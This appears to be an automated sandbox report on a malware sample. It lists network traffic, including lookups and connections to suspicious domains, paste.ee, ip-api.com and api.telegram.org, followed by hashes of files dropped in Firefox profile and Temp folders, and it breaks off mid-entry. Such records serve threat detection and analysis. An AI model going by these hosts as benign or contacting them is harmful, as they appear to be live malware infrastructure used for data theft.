US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 34.149.97.1:443 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 relaxrealty.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
FI 95.216.241.251:443 relaxrealty.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
FI 95.216.241.251:443 relaxrealty.com tcp
US 8.8.8.8:53 251.241.216.95.in-addr.arpa udp
US 8.8.8.8:53 5.161.26.52.in-addr.arpa udp
US 8.8.8.8:53 squeezetopsusa.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
FI 95.216.241.251:443 squeezetopsusa.com tcp
US 8.8.8.8:53 squeezetopsusa.com udp
US 8.8.8.8:53 squeezetopsusa.com udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
N/A 127.0.0.1:53881 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 201.181.244.35.in-addr.arpa udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
DE 23.55.161.211:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 211.161.55.23.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.46:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 142.250.200.46:443 redirector.gvt1.com tcp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
GB 142.250.200.46:443 redirector.gvt1.com udp
US 8.8.8.8:53 r4---sn-aigl6ner.gvt1.com udp
GB 173.194.183.137:443 r4---sn-aigl6ner.gvt1.com tcp
US 8.8.8.8:53 r4.sn-aigl6ner.gvt1.com udp
US 8.8.8.8:53 r4.sn-aigl6ner.gvt1.com udp
GB 173.194.183.137:443 r4.sn-aigl6ner.gvt1.com udp
US 8.8.8.8:53 137.183.194.173.in-addr.arpa udp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 prod.classify-client.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 216.72.190.35.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 107.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 xilloolli.com udp
US 104.21.9.210:80 xilloolli.com tcp
US 8.8.8.8:53 210.9.21.104.in-addr.arpa udp
US 104.21.9.210:80 xilloolli.com tcp
US 8.8.8.8:53 cdn-gravitiumgame.xyz udp
US 104.21.84.91:443 cdn-gravitiumgame.xyz tcp
US 8.8.8.8:53 91.84.21.104.in-addr.arpa udp
US 104.21.9.210:80 xilloolli.com tcp
US 8.8.8.8:53 mysticsmirage.com udp
US 104.21.4.233:443 mysticsmirage.com tcp
US 8.8.8.8:53 233.4.21.104.in-addr.arpa udp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.4.233:443 mysticsmirage.com tcp
US 8.8.8.8:53 shootyprovedn.biz udp
US 104.21.90.42:443 shootyprovedn.biz tcp
US 8.8.8.8:53 42.90.21.104.in-addr.arpa udp
US 8.8.8.8:53 mathcucom.sbs udp
US 8.8.8.8:53 allocatinow.sbs udp
US 8.8.8.8:53 enlargkiw.sbs udp
US 8.8.8.8:53 resinedyw.sbs udp
US 8.8.8.8:53 vennurviot.sbs udp
US 8.8.8.8:53 ehticsprocw.sbs udp
US 8.8.8.8:53 condifendteu.sbs udp
US 8.8.8.8:53 drawwyobstacw.sbs udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.9.210:80 xilloolli.com tcp
US 104.21.4.233:443 mysticsmirage.com tcp
ES 95.182.96.50:80 95.182.96.50 tcp
US 8.8.8.8:53 50.96.182.95.in-addr.arpa udp
US 104.21.9.210:80 xilloolli.com tcp
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 200.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 105.246.116.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\4defcc7e-0668-41d8-9807-bce8a6e82aeb

MD5 d0a9271e19ba4d0f6c6ef3fc6b2f0e37
SHA1 7b6a7d09d81b9d3ddbf2a883f648233682bfd345
SHA256 38f3164bb28da1de874c2bcd3dad44a859db856eed99b3e767b19f840a0b99f2
SHA512 03d0281f264cbecd0042b572e7be418d7dcf875d738eb850e60ceaee96918f44b18e3004ee4584e9abb22ee33ecbad940b294b0e3943ecd409ac51c63526249b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\6a259bb3-a633-4bfd-99e2-0e61fbaada98

MD5 88501986f113103884c371a1b68730b9
SHA1 44c17f70d398c58aa9a28254e2a2f5df923bce6b
SHA256 bfab2f3893fc3d0882d85dd329cd102c9d6dbf37ce365617505d96c4c7a58b94
SHA512 35a439add4b636b73cbc23fb236e93ac737e8814564ca2d21b47c267509604e7bdb7b9ab4f582cbb597a2b9744029a465c2cd83385648093239e9f877d254ee2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\pending_pings\172c7592-abeb-4f01-b0d0-bb1d89543020

MD5 10e81d82125136a41428489764c37d41
SHA1 152427e864464ea9ca9a70c14b2e47d2ac1e62df
SHA256 2b2865ee617cf7d3eea43894ec9052e35ee262a954a8e307103d8687e3b02edd
SHA512 83f24d180d7f219aa5c420b40abd1cce3e6e3174867cc059e4635c96b537cea7ed73095bc7639b89ccb491a357b717a1ec88a409eaa038f7d70b592cf5482c28

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 fa86d3127b05fa5b4cfa5c1620244020
SHA1 326bcaeedb610b86cffdcbae2d4d7990b922d621
SHA256 a1802991b20be3028cf54b14b4bcf0bb66e4b2e6801c27a154c385bd9364b237
SHA512 2f84a4f9e97faed3a03ec91d39b91a301fbcd4da830bbb175d52c3f6ce4cc1d0ef8fc2da99eba662e1609b5950e35dc104a14123aecdccec47dbcb97c5797e99

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\activity-stream.discovery_stream.json

MD5 6803de8259cf8a7dd911ab86170e8978
SHA1 6918ee30f59e745b57cff995c8b88cb68426efc6
SHA256 e10592ce35a232ce83a29995687b782dc4df6147daf676f5d4db136dc7c9690e
SHA512 407d9bfe6d5b64ca1227062cd3519176b7cb175279e2a8b10a1a22c4597864bc1ef52c2611a7bbf8b97d2491c02bd82a416f816cbcb9252f4ceeaa3a781891f6

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 642da0358f4719ee4b4790c05d4a7cc5
SHA1 a2dac4cab10b74eae44107f6c519993b9dc780b9
SHA256 61241dc71f65638429da6afaf9fbb15d530aaa860bf9bd4f1b7492c465cbe074
SHA512 adb5994094e459b427e0896dfb42e755ff609404d1642052f5d489858cd1fdbb574bd78897feb97af58ae7098cda8c55bc3fe30f120f7dae9abddeb3a7e39d2d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 666fcc5290d4be92abefa4cdaee078ee
SHA1 58c0c51a405a3d6ec7e3d09c56a72f5a5440bd5c
SHA256 71cc51c2157168ea4a5f41b7ce2b07bb0ba562288ab5093d85e4bf61ae0be7d0
SHA512 a6437382c960c2e6f306e08fb0454a3fdc17954d84e9fe346d8f25f993a10a8f0ea550fe47a34696d6f9b0a66e9c4a0a6d7300cd9d174912dd4cce6375c2293d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 13e5d7ceb89a4097ae35f82e0580cd88
SHA1 954b26c46496bfdd7126c259612f50326bd462f6
SHA256 2397e0bf9b68709d0cd4e119ce588c23727d358331ab78b665342a2a93477a5f
SHA512 e88acd7a359fd1e2ba4d203cc817c1304859039b774d06632ae1cc4696a7b3119f7587decd9b56f972c778ee8c4696802f54aaf8790d67a54057517b3d676e95

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 574c4ed762e00d262e2578cdd179f284
SHA1 c1acdc51ed8210ffdf4d6b468bc074abb58ecfee
SHA256 f531588be12be03484d3dcd22c8dfc2f02a4f74cd8da810664ba6daac16371cf
SHA512 c559d3796d1e71caf28b58438087b9392514bdda59532afe9167aadaebad1fac8be908882b84afa2a245c0d3513fefd2681d9c1a9443b90aa2fbfbc1fbf4ec95

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\g9per00b.default-release\cache2\entries\0305BF7FE660AF5F32B4319E4C7EF7A7B70257A3

MD5 d169a409dd9a04692f89a73556eb1a6c
SHA1 26eb3390ec7c150bb8cfdc97dc48dd4e32f8178c
SHA256 808f2f6a632666e1d7ca6f07ee4788ab452966f63a81edf56e7bf37abe32b95a
SHA512 67affd6c921174649c757b5f2f84a959fd3097e98c8e10b6191c40c874af8b285505c228c91abf6cdb97a2b81fdb001c6766712bdf9d5704300f894e36279f18

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\prefs.js

MD5 f0299633956e78949e0971a5336d9da6
SHA1 71c0a2f22190c4cfbdd20f42da1e7d71f31c61ec
SHA256 3a3ba1ad0da9cd232cd0900a98bc6e0851984f2261615386b224502be8f6822e
SHA512 3314698ad1eaa0ec4bc32e59f6bad0e4c35710096e5fce625cd0e8eaf54ad53c191ea02161374a78035e0f5fca164980e9e6506dd340346a1368f680968dd109

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\AlternateServices.bin

MD5 9ddd2a01046cbab7f7b6a6a4f388a756
SHA1 5e35d6175d99329b2b5a140f2a74ce13e6e92da4
SHA256 38c38fa3d47172a2e88f02c2a49c80b9f559132d1cc7a95f6ed24cbd28e856b4
SHA512 ed62b9279c6467f1b5543b7e018ab24b931ba6afc638674616f877cba3c411eb55c75f54a8d95d7933f2fe8b0ef9389fa5efaddb965a48daf572f2f931db5abe

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

MD5 7ed81394f2a2b737d7d177827dc52937
SHA1 1b19ade845aa51735c2e475de8311a519f84ba30
SHA256 f6aa29a70144f6eae0116914f8add4fff06c097ce8445fc29fbc441c7066897d
SHA512 03268eccef510ff74ca051d91d7d918e0ec6848530f689e6f3c368ca3deb662ebc9baed22848a5c3f83e6a9561aca9151272343982bd4ec6a3b0435b64eeadd3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\datareporting\glean\db\data.safe.tmp

MD5 5b55c7f704ae21d743c3e4ac4fc5fa68
SHA1 ae6b1d83c5814cf742140a68363359eb58186d57
SHA256 9d79ad3ff37b6c081d369ca2756e778b36104d7f4258ad6f99940b94ee584611
SHA512 0c730a9311f6c2fec45ca28479800ac264f8fb6a8d7c0f1a8ade2ceca788d2e9064b73f130faee963d445f044fce71c0f795e3e7d8fb649b6f13242a8ebba2de

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\g9per00b.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostfxr.dll

MD5 307b6f5832c5b80c8bc87d97b67e4775
SHA1 9ab2916ae987ebf0131bab10e449933f3fadcfc0
SHA256 7652aeb0ecb06119b0871f6b850193d3ffae73e22bf207c81b67b155afa85991
SHA512 cec6e1b2c278b287fc05767a7c596b8f1d180d24ca5be0d4ed484ca8e82487bcc804245e6c60e45852ba7964a3b288f42504c792a617f5200b461089d7a9219b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\hostpolicy.dll

MD5 314f06e61af6221c9b4b0af77e1af522
SHA1 73b811d6488ab3dbb7edf9cf7d3daa0ce2343585
SHA256 ee653d530f0ba5bf0e7f691825dcbd2dc6995374820d7e4aef0604cc47c3b3ab
SHA512 b05785222438da0f1b0a30ed77d3977c8a96fda00cfe8475816cbcc9b05176253d8a150d713ca99f58145d36ecce7ab643cfc15def39e1169a122dcc2cbd863b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\coreclr.dll

MD5 a2820e527c4b99c4c649df4e54d4f38d
SHA1 a2bca67626d532a3b1a96c5d913958470faa4727
SHA256 100a032cbeb299c8d7cfe02fb39ca59c8d17fbbe276ed1da577c0eb6444b1a51
SHA512 a0942fbe93394d0978cf5f9747fdff4db90faa88b264dc56ae79d50fc0fc17b2701a211a46fff86d579465273156fb278f49a89e5abd6c63fa7acccdd03a6627

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.CoreLib.dll

MD5 3bef1d84ef1785381eff399adec681df
SHA1 6a933f1c9f8f5cecb0ffa9aa0d6b382854ed99ae
SHA256 43ccf83cf6dd08e2ba9159990a0b099493667c423de51b1db1191f05a748fe51
SHA512 9f436e7eb201927663b93e691d781b44d2d34011215a2b4dbf7584e5d788528f7601a7e9e4bbf422734ab9792984a44eed2bf5d9298940eb37420bfdef2066c2

memory/1776-3133-0x00007FF8A8D76000-0x00007FF8A8D77000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\Installation_x64.dll

MD5 963e14be9b45b9f44763de5caa628503
SHA1 1bed67492024523e3974bf1bac98323ecd982986
SHA256 9053c83a9b1e0b3da1c7d9620490d855124d2878e72cb54648dde00ef6377105
SHA512 89815cc3f7c32e85b1cf513ef0863fefe0a1151b4d135616aa1a773f87aeb633b489f0fe150ee39750dd64ab8be800a2b8a1c5b0bfcae29d7e7ce14083ae44f0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\clrjit.dll

MD5 8e636859f42c166c13eb041311299b8a
SHA1 d5b0d5104c5cfe1b7b2c95d7680c2e84d4f0d70b
SHA256 d713a5bafa2ef2fa7c1594d9c22d03357f62f8cb359208bf9e3616639dc351f9
SHA512 a5fbee9f04f5ef53c6ab2c666cb1f9e620ceacb25fc2eeb8a079887e2f3f3a3bbee88c6036d39125138f93c599986697444707db90e5ac30515e59d54246e094

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xaml.dll

MD5 b8669a3dbb9ba437449cecd2cf16282f
SHA1 abca27d391ceb6b86ebc730196688258d17618b8
SHA256 7bd25ecc597ab4724f1275d9e4ed74b72d8b0811e062946bf2f338af5d890c8c
SHA512 34fd7a604aa31383bc0639aad79c039cefea03de224cfe957f43e2d2140ef0bf1cc25fc9034a56c8bb1a46d8e1221e8af50353bc36cb88171fcda229632a42d6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Runtime.dll

MD5 6874d29dc20943dd13b3898cd54cdd88
SHA1 3eb8c35b2792f5433f45bb4f04e63fa16e7d9782
SHA256 20a1ecc100a50c567c170063b18e1fdb0f9d41ea5878981bd3c38f95544ca529
SHA512 c800164aef2b1bfbd01f16360184bd416536ee4e182f39317f89702465d11616ce320575e6e442552142957f027a3012126eed54c32ed39d585a357fa26f01b0

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Private.Uri.dll

MD5 8a730b383910a79ea2b9d1c06b11a7ae
SHA1 e9905d342be85151eb94f42da135aec525cc2494
SHA256 a1659efc1d703b3ead12b4e2132d3e2d7443c921e2833a554961173510ffd211
SHA512 7182a50910cc21698c1edc53c8f13fa9cd526c231e951d6f05df68daa864ddfbd4a365609c35f7d1d1bc1da7d08ee1c251f6a96e30b1e33644a0b32e95b57d52

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Linq.dll

MD5 27fea566be23b3fc10d7d8274184bbed
SHA1 6e01bcca3ef6bb6a9673f1aecd60881e42856003
SHA256 990e7ce0c3aa912e4cec7cdd6d9602c202daba2759058ed61e5f1a002035ae3a
SHA512 c099b03bf4ea3614ab4b65d1e853ef5507ee134b534e350bcaa570ba31a92623c9c6fa8dcf80e671937c7acc20f9aae127df2ce1caf415a514a9b01ba8448904

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Thread.dll

MD5 e28b58d37ecfc7eceaf280ed742343f5
SHA1 bb9a306bd8be1579f81edb80ad0114d28d2bd114
SHA256 de01a740531b6411d8b01a38a416b6388d755954a7d29d6b50ca71f0ae4c96bc
SHA512 83dbaf4e873e8174ae9716ca1b8300636761902da5c0232d3b4de31e51c95494e23a67859576804412c345b01813cdfa60ce034d9c8f89374c1e0c7ac4a55aa6

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\PresentationNative_cor3.dll

MD5 93b917c939ec3ddfdb75359a1c38961d
SHA1 62352b83989ca301629d20f0a519b6cdde3569a5
SHA256 ed4eefa93debb2967807bf866aa5eb0b80d953d1e6a0ac43a337e36e1e4beb5e
SHA512 245e99b7711fd49cd14bda8e0bd78144fbd68dec1af399892ba1eba256670cd60b3f85535408990be8c01dd7cd8f81efabc022980384844dd994f169f7eb286c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Xml.ReaderWriter.dll

MD5 24afced7db9a99bc4ac548e99763a093
SHA1 cf7e9bd3d518d5eba31b02e31d53a655cc3f92f5
SHA256 6d545167f9262a28c9ef9fe8e639e6219e9ab2d124654da1a8eb6fa0db9e0183
SHA512 43b8aa57a64aa0dd4e8056fd7d2c4ced02c9ef213ea1a435941f787cb613bed7134fb2431ee01fc6e70302785fdbaca65d9640d0cbb647734a2760208e639efa

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.Encoding.Extensions.dll

MD5 128862b6211e4968b44c417be3b7373b
SHA1 acae1850a6082e2f8ab717377d63b0a771a8d970
SHA256 4b406bd4a1a4c7d4015d5c7f5cf9671dec32209e22f9b1872d85876ac72c77db
SHA512 c06a0fc69379139be339d64e6a3c474f910743b80691055e8d7b7340a89175a312ba78f282e03cb96568f031de84700d2896c06d8c2749211708b6807acec0f1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Threading.Tasks.dll

MD5 2110985791b8fded0dcd4e67a5727665
SHA1 d1049e6fa55b4cd0034acdccf851a49e7538c141
SHA256 5ae758da56765672300750a5da4552946e9fcd1da0b0dbf41aa7ea6b55c6cbef
SHA512 585fdff6bced4513518d79486add78a5bd8b11ffbbaf3c07831de9b26b5e0760dce69ec6e3d1773a59b9244d1ff16041e197b100681154c8c59273ea5153bcf1

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.ObjectModel.dll

MD5 c0fd9e3d9cf11aebade4c9154d343377
SHA1 c1bee1d415e8301f78861fc88271609388652c61
SHA256 dd3056b9a3fabd89fc59b0feb6fa0edececf76f88f96a545585b48242ecfbbd9
SHA512 3f65d44c257f72c9970b1b8c5206dd884020faa0da9487898277bc4f218d189b5dd6c2a2963e1f8f653c14baf17f7fb9b415aeca064d450f8e572dea229fb58b

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\UIAutomationTypes.dll

MD5 c856a5e1458398c5d869263b3ba4af4a
SHA1 961d244e882858695be7e92bbfba2dfe15f01a10
SHA256 d9ea457607174d8f78ce78ae1b4c12aefc6c78f02eca88ca005ecd92866dfc45
SHA512 512435de86a446848540887354799eee0605d6d113c043772eaa3bc992c0a838c078560ab04e2a3b0e153e566e8f727bb473ecf541872eb9c4e7d62623602fa5

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\wpfgfx_cor3.dll

MD5 d99c93b53749d4364c7b16d5d99e3935
SHA1 cd9743223ba6c1199ea57d6dfbd764e2aff60033
SHA256 f8f7f596cd6151b47784ed96223d16f54b2b872768b03a0492ef19513c05771a
SHA512 ca29d5136c5d7b6b99009a9a356d62eff88acebf32707b8c1e540a7b946420aab5cc0f1148b7ebac891ff3afb321aca4bc122cfb20395ad3baf1cb68ee76a928

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\D3DCompiler_47_cor3.dll

MD5 c4974c924b605bd322c4872d72de90d1
SHA1 20df9433eab24d3291696046646f493794b77cba
SHA256 71d766b4742ca9f7422bb2efc3dc03f2cee509a5a43d241e748cda7aaac24bf4
SHA512 3889648dbb4608ece9c68f1cd5b1601da5b795eade7910764dd4769090cdb209a39acf3986e6e7190745f3bc6b1477a52dfaccb96a7e799eafc0825e2c44a846

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Collections.Concurrent.dll

MD5 992c175788f755fb2a42d8396d3cdc81
SHA1 e6356673f7388c74398874e0788964652120721f
SHA256 e0b327e294e9d2159dc124d1f8008438273e36902bf7d3c75589c0374b2d2169
SHA512 7e741cd8763fa32d243d540b7abaf9bc993a2a6d870b08d3ab52de5c8462432d026d3a22ceea51ebd98f03903083fa1e0551168559f14cd846175a5030c314e5

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.WebHeaderCollection.dll

MD5 596e86ca6e905e9e39a22a414565e837
SHA1 5b20a087f3053353d044ac3e7bd910e84cd95775
SHA256 1233307a5c573f5fd04bbbe86181477d60fff68c7b023693c7d1a79d46a2dec3
SHA512 4261502b56e965cba5fefe7af39b42533daa82d8a840288c7c326801c040d51c38dcd21f59f43f6664cb759b2c20c904812ea570711e3cadab0ccff031e7509c

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Text.RegularExpressions.dll

MD5 a4a481b0511e35077b8686a709a25c21
SHA1 ad18ab5564f818437d53a52c617493b5b04473e8
SHA256 208ae0dc8e09d5b414efea346f22e847e9bbcc23ccf4d652632cbf8ced0bd846
SHA512 97eda35809808028889a68750ba84da7bee745d812380ecedd77392418531cb70cc0622cde9bd5cae94bcbe47a7a29addba02a39b00c2bc9c3a276593eae94fc

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Net.ServicePoint.dll

MD5 d9493d7a81e9cbf310c1abf17011893a
SHA1 cee4c0895eab932c46889315b9084ec89c38e9a3
SHA256 5c127c2d20f679a2470ed22cf3803fb40f9ccc6b4c7f9fcf8f4cb6502adc215c
SHA512 bcc4db709c18a19c9cf699b57fc434e57bd7dfe8cd7781337fc80eea9f8b423ebcc11b86a340544a3baeedd4952af9663ef21efc547686aa1c134d28d3ba440f

C:\Users\Admin\AppData\Local\Temp\.net\Installation_x64\G4W88503Hx2oLI_7hHhTf85H_RjMA2M=\System.Security.Cryptography.X509Certificates.dll

MD5 1bb84a0914dd86646d4d423172c2bda4
SHA1 58a9ab1f5c9f54f43c7927a674cc115e8b4c5ffd
